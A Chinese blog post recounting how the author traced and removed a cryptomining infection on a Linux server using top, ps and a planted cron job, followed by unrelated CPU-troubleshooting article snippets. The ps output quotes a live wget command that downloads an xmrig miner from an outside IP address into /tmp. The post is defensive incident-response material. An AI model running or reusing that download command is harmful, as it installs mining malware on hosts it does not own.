linux一次进程cpu100记录

最新推荐文章于 2024-03-05 00:48:34 发布
最新推荐文章于 2024-03-05 00:48:34 发布
阅读量883 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wwzuizz/article/details/87077093
本文详细记录了一次服务器遭遇挖矿病毒攻击的过程。通过使用top命令发现CPU占用异常,进一步利用ps命令和grep定位到病毒源wget下载的恶意文件。深入分析定时任务,最终删除病毒文件和定时任务,成功清除病毒。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近遇到一个问题,发现导致经常cpu爆满,导致tomcat,nginx等出现异常。

1、查看异常进程

top命令

2、查看PID对应的文件

ll /proc/PID/exe

3、通过ps命令得知文件来源

ps -ef | grep php

nobody   11036 10981  0 11:28 ?        00:00:00 wget -O /tmp/php http://91.201.42.5/xmrig_64?19517

4、由此知道是由wget 下载xmrig_64 这个文件生成了php这个病毒文件,百度之后发现是挖矿病毒,删除后还会自动生成。查找定时任务

ls /var/spool/cron

发现下面有一个nobody的文件,vi打开正是下载的东西,删除之后解决

 

Linux进程 CPU 高问题,用 Shell 脚本发现处理
Richardlygo的博客
07-24 783
首先,我们需要编写一个Shell脚本来发现系统中CPU使用率最高的进程。分析原因:在采取任何行动之前,分析高CPU使用率的原因,可能是代码问题、资源争用或其他因素。优化和调整:根据分析结果,对系统或应用程序进行优化和调整,以避免类似问题的再次发生。记录日志:在脚本中添加日志记录功能,记录CPU使用率的进程信息,以供后续分析。语句判断该进程CPU使用率是否超过设定的阈值,并输出相应的信息。在发现高CPU使用率的进程后,我们需要决定如何处理它。获取进程CPU使用率:对上一步获取的进程ID使用。
Linux脚本:当某个进程CPU占有率超过80%(过载)的时候,在命令行窗口显示对应的进程的信息
weixin_70208651的博客
07-22 1207
要在Linux中实现当某个进程CPU使用率超过80%时,可能会有导致CPU超负荷的危险,因此我们要监视这样的用户进程。使用一系列的工具和脚本来完成这个任务。 从对linux系统命令的了解,可以考虑使用top命令配合awk和bash脚本来实现这一需求;整个脚本的设计旨在提供一个简单而有效的解决方案,用于监控Linux系统上的进程活动,特别是在那些需要实时响应系统资源使用情况的环境中。通过这方式,系统管理员可以迅速采取措施,优化系统性能或处理潜在的问题进程。脚本在centos环境成功运行,可以达到预期效果。。
Linux系统CPU占用100%原因分析
Make
05-16 1205
top查看发现是几个php-fpm占用了 参考了一些方法无果: linux php-fpm进程 cpu占用过高 解决方法_whatday的博客-优快云博客_phpfpm占用cpu高 liunx服务器php-fpm占用CPU过高_二十二DF的博客-优快云博客 linux线上CPU100%排查 - 知乎 jstack 找不到这个功能 ... 后来在查看日志的时候发现了问题: 那些php进程pid出现在这,对应的站点程序文件也清楚了。 再看站点的日志: 原来...
linux系统怎么创建进程数,Linux创建进程数的限制
weixin_34620658的博客
04-28 446
Linux上创建进程据说消耗很少,这个一直是Linux的特点,于是就专门测试Linux创建进程的极限,测试代码如下://fork.c#include #include #include #include #define MAXPROCESS 65535 #define SLEEPTIME 60 int main(int argc, char **argv) {pid_t pid; int cou...
Linux基础之查看系统cpu内存进程等信息
weixin_34408624的博客
04-17 90
Linux系统信息 转载于:https://blog.51cto.com/lareinay/1916787
Linux 进程的创建
爱上小公举
11-28 590
目录 进程创建 fork()函数 fork返回值 fork写时拷贝 fork失败原因 fork用法 进程创建 Linux 中我们可以说一个进程就是一个PCB, 即 一个task_struct, 那么创建进程也就是创建PCB, 即是创建task_struct Linux 中说到进程创建, 就不得不提到 fork()函数. fork()在Lnux下是非常重要的一个函数 . ...
linux cpu占用100%排查
qq_34506014的博客
04-03 1517
步骤一、找到最耗CPU进程 工具:top 方法: 执行top -c ,显示进程运行信息列表 键入P (大写p),进程按照CPU使用率排序 图示: 线上服务CPU100%问题快速定位实战 如上图,最耗CPU进程PID为10765 步骤二:找到最耗CPU的线程 工具:top 方法: top -Hp 10765 ,显示一个进程的线程运行信息列表 键入P (大写p),线程按照CPU使用率排序 ...
linux下通过go语言获得系统进程cpu使用情况的方法
09-15
Linux环境下,获取系统进程CPU使用情况是监控系统性能的重要环节。Go语言作为一种强大的系统编程语言,提供了丰富的标准库,使得我们可以方便地调用操作系统接口。本篇文章将详细介绍如何使用Go语言结合Linux的`ps...
一次tomcat进程cpu占用过高的问题排查记录
01-20
本文主要记录一次tomcat进程,因TCP连接过多导致CPU占用过高的问题排查记录。 问题描述 linux系统下,一个tomcat web服务的cpu占用率非常高,top显示结果超过200%。请求无法响应。反复重启依然同一个现象。 问题...
Linux进程的创建
pkusail的博客
03-19 442
本文主要通过自身实践,介绍了在Linux下进行进程创建的简单实例。 进程的一生 随着一句fork,一个新进程呱呱落地,但它这时只是老进程的一个克隆。 然后随着exec,新进程脱胎换骨,离家独立,开始了为人民服务的职业生涯。 人有生老病死,进程也一样:         –自然死亡,即运行到main函数的最后一个“}”,从容地离我们而去。         –自杀(自杀有
Linux系统cpu飙升到100%排查方案
小相探索IT世界
03-05 1198
Linux服务器CPU突然飙升到100%,这时候系统直接卡死,很多新手面对这种情况经常束手无策,本文就针对这个问题提出个人方案,希望能帮助到你们。
解决100进程莫名其妙逐渐挂掉的问题
认知 行动 坚持
03-24 9150
上周天遇到这样一个问题: 开启某操作后, 开启了100进程, 几分钟内, 这些进程逐渐全部挂掉了。 当时无法用root身份登录机器, 无法看到内核log信息。 蛋疼了一整天,  但这个问题几乎必须要在24:00前解决, 几乎是必须。 白天的思路是, 肯定要100进程才能快速做完啊。 而且之前在别的机器上, 也玩过200个进程同时跑的事。          找了好久, 都没有找到原因,
linux php cpu 100%,Linux进程占用CPU100%的解决方法
weixin_30981569的博客
03-18 590
Linux进程占用CPU100%的解决方法发布时间:2014-03-21 15:50:45来源:红联作者:tiocedlinux 很好,占用系统资源低,低端机都可以流畅的运行.但是偶尔也会遇到像windows下烦人的问题,那就是进程占用CPU100%.最近我就遇到了这个问题,还好,我使用了一套组合拳,把占用CPU资源100%进程给干掉了.步骤是:1)先top,查看进程运行状况,包括进程ID,C...
Linux 系统 CPU 100% 打满了!
LinkSLA的博客
03-28 2475
昨天下午突然收到运维邮件报警,显示数据平台服务器cpu利用率达到了98.94%,而且最近一段时间一直持续在70%以上,看起来像是硬件资源到瓶颈需要扩容了,但仔细思考就会发现咱们的业务系统并不是一个高并发或者CPU密集型的应用,这个利用率有点太夸张,硬件瓶颈应该不会这么快就到了,一定是哪里的业务代码逻辑有问题。在编码的过程中,除了要实现业务的逻辑,也要注重代码性能的优化。一个业务需求,能实现,和能实现的更高效、更优雅其实是两种截然不同的工程师能力和境界的体现,而后者也是工程师的核心竞争力。
Linux 排查CPU 100%问题
一个刚入行的新人猿
09-24 863
定位问题 top //查看进程CPU占用情况 显示有问题的线程(找出该进程内最耗费CPU的线程) ps -Hp pid //找到进程中的线程 top -Hp pid 通过jstack将问题dump到一个文件中 jstack pid > pid.log 4.将进程id转换为16进制 因为线程快照中线程ID都是16进制存放的 printf "%x\n" pid 5.然后通过16进制的进程id 去 pid.log文件中查看问题 ...
linux md进程占用100,Linux进程占用CPU100%的解决方法
weixin_39528029的博客
04-29 580
Linux进程占用CPU100%的解决方法发布时间:2014-03-21 15:50:45来源:红联作者:tiocedlinux 很好,占用系统资源低,低端机都可以流畅的运行.但是偶尔也会遇到像windows下烦人的问题,那就是进程占用CPU100%.最近我就遇到了这个问题,还好,我使用了一套组合拳,把占用CPU资源100%进程给干掉了.步骤是:1)先top,查看进程运行状况,包括进程ID,C...
linux查看日志内存,linux查看日志、磁盘、cpu、内存使用情况及清理磁盘,日志等。你需要的linux常用基本操作都在这里!!!...
weixin_35882236的博客
04-30 2383
linux查看日志、磁盘、cpu、内存使用情况及清理磁盘,日志等。你需要的linux常用基本操作都在这里!!!这篇文章对于学习这个知识点有较好的参考作用,需要了解这方面技术的可以斟酌学习一下。一、查看日志1,查看实时日志tail -f 日志文本名2,查看实时日志指定关键字及高亮显示// 如果不需要指定行数就删除-A3tail -f 日志文本名 | grep '关键字' --color=auto...
Linux cpu 详解
JP.Zhang
03-19 2105
Linux cpu 详解一、写在前面这篇文章主要介绍了,Linux 系统通过cat /proc/cpuinfo 文件来查阅相关CPU 信息,例如:几个物理CPU/几核/几线程,目前这样的相关信息在网上有比较多的介绍,这里根据自己的实际操作验证,从中学习记录,方便后续查询。邮箱地址:jpzhang.ht@gmail.com 个人博客:https://jianpengzhang.github.io/
linux 查看进程 cpu 历史
最新发布
03-13
<think>好的,用户问的是如何在Linux中查看进程的历史CPU使用情况。首先,我需要回想一下Linux系统中常用的性能监控工具。常见的工具有top、htop、ps,但这些工具主要显示实时数据,可能无法直接查看历史数据。 接下来,可能需要考虑系统内置的工具是否有记录历史数据的功能。例如,sar命令属于sysstat包,可以收集和报告系统活动信息,包括CPU使用情况。sar默认会定期收集数据,用户可能需要安装并启用sysstat服务,然后使用sar -P ALL来查看各CPU核心的历史数据,包括特定进程吗?不过sar可能更多是系统层面的,而不是单个进程的历史数据。 然后,进程级别的历史数据可能需要借助其他工具。比如,pidstat也是sysstat的一部分,它可以报告各个进程CPU使用情况,但同样可能需要配置才能记录历史数据。用户可能需要设置sysstat的定时任务,定期记录数据,之后才能查看历史记录。 另外,用户如果希望实时监控并记录,可以使用top或htop结合重定向到日志文件。例如,使用top -b -d 1 -p PID >> cpu.log,这样每隔一秒记录一次特定进程CPU使用情况。不过这种方法需要用户提前启动记录,无法查看过去的数据。 还有一种可能是使用ps命令定期抓取进程的状态,写入日志文件。例如,写一个shell脚本,用循环执行ps -p PID -o %cpu >> cpu_history.log,并配合cron定时执行。这样就能积累历史数据,但需要用户主动设置。 另外,像Prometheus和Node Exporter这样的监控系统可以长期存储指标数据,但配置起来相对复杂,可能适合有运维经验的用户。对于普通用户来说,可能更倾向于使用已有的命令行工具。 总结下来,用户的问题需要分情况讨论:如果已经配置了sysstat,可以用sar或pidstat查看历史记录;如果未配置,可能需要实时记录或使用其他工具。同时,需要给出具体的命令示例,帮助用户操作。另外,要提醒用户sysstat的安装和启用步骤,因为有些系统可能默认没有安装。 最后,生成相关问题,例如如何监控内存使用历史,如何自动化记录进程指标,或者如何分析CPU使用率高的原因。这些都能帮助用户进一步解决问题。</think>在Linux中查看进程的历史CPU使用情况可通过以下方法实现: ### 一、使用sysstat工具包 1. **安装sysstat**: ```bash sudo apt install sysstat # Debian/Ubuntu sudo yum install sysstat # CentOS/RHEL ``` 2. **启用数据收集**: ```bash sudo systemctl enable sysstat && sudo systemctl start sysstat ``` 3. **查看进程历史CPU使用率**: ```bash pidstat -p <PID> -u -T ALL ``` 参数说明:`-p`指定进程ID,`-u`显示CPU使用率,`-T ALL`包含时间戳[^1]。 ### 二、手动记录实时数据 ```bash watch -n 1 "ps -p <PID> -o %cpu,time >> cpu_history.log" ``` 该命令每秒记录一次进程CPU使用率和运行时间到日志文件。 ### 三、使用top命令定向输出 ```bash top -b -d 1 -p <PID> | grep <进程名> >> top_cpu.log ``` 参数说明:`-b`批量模式,`-d 1`每秒更新,`-p`指定进程ID。 ### 四、通过systemd-cgtop(容器进程) ```bash systemd-cgtop -b -d > cgroup_cpu.log ``` 适用于基于cgroups的容器化进程监控。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值